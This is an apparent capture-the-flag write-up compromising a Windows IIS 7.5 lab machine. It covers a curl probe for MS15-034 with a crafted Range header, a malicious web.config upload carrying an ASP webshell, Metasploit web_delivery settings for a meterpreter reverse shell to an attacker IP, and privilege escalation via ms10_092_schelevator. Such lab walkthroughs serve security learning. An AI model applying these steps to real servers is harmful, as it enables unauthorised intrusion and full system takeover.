1) Locate the file upload page
2) Upload a webshell by exploiting the web.config file.
3) Establish a reverse connection with the MSF web delivery module
4) Check for privilege escalation with the MSF exploit suggestor
5) Exploit ms10_092_schelevator for root
We start off with a basic nmpa scan and learn port 80 is running. From here we launch a standard scan covering all ports by using the -p- flag. Upon seeing that no high ports are open, we launch into a more indepth scan with the -sC -sV flag, for default nmap scripts and versions checks.
Seeing that port 80 is open with Microsoft-ISS 7.5 running, we will be rather limited with our entry point and proceed to browse to the website over port 80. Here we are greeted with a trolling magical wizard, suggesting largely that what we need look else where.
Moving into directory busting, I found absolutely nothing as I scanned with several word lists. After viewing the forums I learned that we have to think about with the wordlist and our windows server. The connection finally came to me, when I ran a wordlist with the .aspx extension (Active Server Pages).
Seeing only an upload button, my knee jerk reaction was to start uploading reverse and web shells with no luck. I spent majority of my time there after researching and eventually came across this article explaining the known vulnerability MS15-034.
This article talks about MS15-034 - a vulnerability on IIS servers that opens the door for remote code execution requiring only a specially handcrafted HTTP request.
The vulnerability is in the range header, which can be used to trigger a buffer overflow.
A range header is normally used for requesting parts of an object,
We can check if range headers are allowed with
Curl -I 10.10.10.93
We then check if the server is vulnerable to MS15-034 with
curl -v 10.10.10.93 -H "Host: anything" -H "Range: bytes=0-18446744073709551615"
The response suggested the server was vulnerable, as per the article above. So I proceeded to launch the exploit from metasploit to dump its memory.
This was a great find, but unfortunately it wony go anywhere unless I am willing to start modifying the auxiliary module. I did manage to uncover a denial of service attack which was not helpful, but interesting.
I later came across this link talking about the exploitation of the web.config file for RCE.
Giving this a once over, I was successfully able to replace the web.config file, by uploading ASP code to return the value "3" to the screen when executed. Here we simply create a file named web.config and place our malicious code inside.
We then tried a reverse connection which did not work followed by web shell. The ASP webshell kind of worked, giving me this.
I then thought to try nishang, and I got no where.
Some more research suggested web shells were common for exploiting this vulnerability and I eventually came across this webshell here.
I then copied the above webshell, and appended it to the bottom of our web config file executing the script shortly after by browsing to the uploadedfiles/web.config location.
I proceeded to run commands but received no response. I reviewed the source code again and did not see anything suggesting verbose output, so I proceeded to research and use various powershell commands to call a reverse shell. I had absolutely no luck until someone pointed me in the direction of rapid 7's script web delivery module. This module fires up a server with a payload, and generates the call back code for the user in an encoded format.
I opened up metasploit and loaded the module
The target here is set for PSH which stands for powershell. Initially we run the module, and it outputs the code in an encoded format while spinning up the remote server, without payload for the target to download with "download.string".
set lhost 10.10.14.57
set srvhost 10.10.14.57
set payload windows/x64/meterpreter/reverse_tcp
set target 2
I decoded the encoded text to take a look at the exact command.
From here, we copy the code and paste it into the browsers webshell.
With our reverse connection, we now browse to the desktop of Merlin and cap the user flag.txt.
Something really cool we can do here, is to load up an exploit suggester in metasploit. We can do this by switching to a different sessions, and calling the exploit suggester, while setting the session to our sessions with the reverse connection.
Exploit Suggest Image#################
So there are a ton of exposed vulnerabilities here, and we start going through the list to see what sticks. I finally had success with exploit/windows/local/ms10_092_schelevator.
ms10_092_schelevator exploits the task scheduler 2.0 XML 0day exploited by stuxnet. The attacker can by pass the check sum which uses CRC 32 by causing a collision and injection commands to run under the administrator.
We call the exploit, set our options and set this exploit to run over session 1 or our original session with the reverse connection.
We become administrator, and our able to cat the root flag.
This was a fantastic box and I thoroughly enjoyed it.